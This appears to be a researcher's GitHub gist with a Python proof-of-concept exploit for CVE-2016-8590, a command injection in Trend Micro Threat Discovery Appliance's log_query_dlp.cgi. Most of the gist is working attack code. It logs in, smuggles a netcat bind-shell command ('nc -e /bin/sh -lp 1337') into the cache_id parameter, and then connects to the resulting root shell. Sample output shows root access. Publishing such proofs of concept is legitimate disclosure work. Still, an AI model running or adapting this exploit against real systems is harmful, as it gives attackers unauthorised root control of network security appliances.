Created
April 11, 2017 08:04
-
-
Save malerisch/7b84a4bd6eee0a3a591677f421653a2e to your computer and use it in GitHub Desktop.
CVE-2016-8590 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python | |
""" | |
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Remote Code Execution Vulnerability | |
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ | |
File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
Summary: | |
======== | |
There exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. | |
Notes: | |
====== | |
- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was | |
exec a bind shell using netcat. | |
- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... | |
- Auth is now bypassed, please see CVE-2016-7552 | |
Example: | |
======== | |
saturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py | |
(+) usage: ./poc.py <target> <pass> | |
(+) eg: ./poc.py 172.16.175.123 admin123 | |
saturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py 172.16.175.123 admin | |
(+) logged in... | |
(+) starting backdoor, this will take a few secs... | |
(+) calling backdoor! | |
id | |
uid=0(root) gid=0(root) | |
uname -a | |
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown | |
exit | |
""" | |
import re | |
import os | |
import sys | |
import time | |
import requests | |
import threading | |
requests.packages.urllib3.disable_warnings() | |
if len(sys.argv) != 3: | |
print "(+) usage: %s <target> <pass>" % sys.argv[0] | |
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0] | |
sys.exit(-1) | |
t = sys.argv[1] | |
p = sys.argv[2] | |
bu = "https://%s/" % t | |
l_url = "%scgi-bin/logon.cgi" % bu | |
e_url = "%scgi-bin/log_query_dlp.cgi" % bu | |
s = requests.Session() | |
def exec_bd(s, e_url): | |
# now we setup our backdoor | |
# no reverse, since it seems to fail !? | |
netcat = "test|`nc -e /bin/sh -lp 1337`" | |
e_url += "?act=search_advanced&cache_id=%s" % netcat | |
s.get(e_url, verify=False) | |
# first we login... | |
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) | |
if "frame.cgi" in r.text: | |
print "(+) logged in..." | |
thread = threading.Thread(target=exec_bd, args=(s, e_url,)) | |
thread.start() | |
print "(+) starting backdoor, this will take a few secs..." | |
time.sleep(4) | |
print "(+) calling backdoor!" | |
os.system("nc %s 1337" % t) | |
else: | |
print "(-) login failed" | |
sys.exit(-1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment